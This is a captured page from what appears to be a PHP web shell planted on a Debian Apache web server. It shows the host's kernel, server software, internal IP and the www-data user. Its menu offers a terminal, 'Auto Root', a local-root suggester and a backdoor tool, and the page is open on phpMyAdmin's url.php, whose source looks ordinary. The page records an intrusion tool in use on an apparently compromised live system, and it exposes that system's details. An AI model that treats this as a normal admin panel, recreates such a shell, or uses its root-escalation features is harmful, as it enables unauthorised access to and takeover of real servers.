Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
phpmyadmin /
Delete
Unzip
Name
Size
Permission
Date
Action
doc
[ DIR ]
drwxr-xr-x
2025-06-07 11:58
js
[ DIR ]
drwxr-xr-x
2025-06-07 11:58
libraries
[ DIR ]
drwxr-xr-x
2025-06-07 11:58
locale
[ DIR ]
drwxr-xr-x
2025-06-07 11:58
sql
[ DIR ]
drwxr-xr-x
2025-06-07 11:58
templates
[ DIR ]
drwxr-xr-x
2025-06-07 11:58
themes
[ DIR ]
drwxr-xr-x
2025-06-07 11:58
autoload.php
76.25
KB
-rw-r--r--
2025-04-08 15:25
config.sample.inc.php
4.7
KB
-rw-r--r--
2023-02-07 21:35
favicon.ico
21.96
KB
-rw-r--r--
2023-02-07 21:35
index.php
1.05
KB
-rw-r--r--
2023-02-07 21:35
robots.txt
26
B
-rw-r--r--
2023-02-07 21:35
show_config_errors.php
1.13
KB
-rw-r--r--
2023-02-07 21:35
url.php
965
B
-rw-r--r--
2023-02-07 21:35
Save
Rename
<?php declare(strict_types=1); use PhpMyAdmin\Common; use PhpMyAdmin\UrlRedirector; if (! defined('ROOT_PATH')) { // phpcs:disable PSR1.Files.SideEffects define('ROOT_PATH', __DIR__ . DIRECTORY_SEPARATOR); // phpcs:enable } if (PHP_VERSION_ID < 70205) { die('<p>PHP 7.2.5+ is required.</p><p>Currently installed version is: ' . PHP_VERSION . '</p>'); } // phpcs:disable PSR1.Files.SideEffects define('PHPMYADMIN', true); // phpcs:enable require_once ROOT_PATH . 'libraries/constants.php'; /** * Activate autoloader */ if (! @is_readable(AUTOLOAD_FILE)) { die( '<p>File <samp>' . AUTOLOAD_FILE . '</samp> missing or not readable.</p>' . '<p>Most likely you did not run Composer to ' . '<a href="https://docs.phpmyadmin.net/en/latest/setup.html#installing-from-git">' . 'install library files</a>.</p>' ); } require AUTOLOAD_FILE; $isMinimumCommon = true; Common::run(); UrlRedirector::redirect();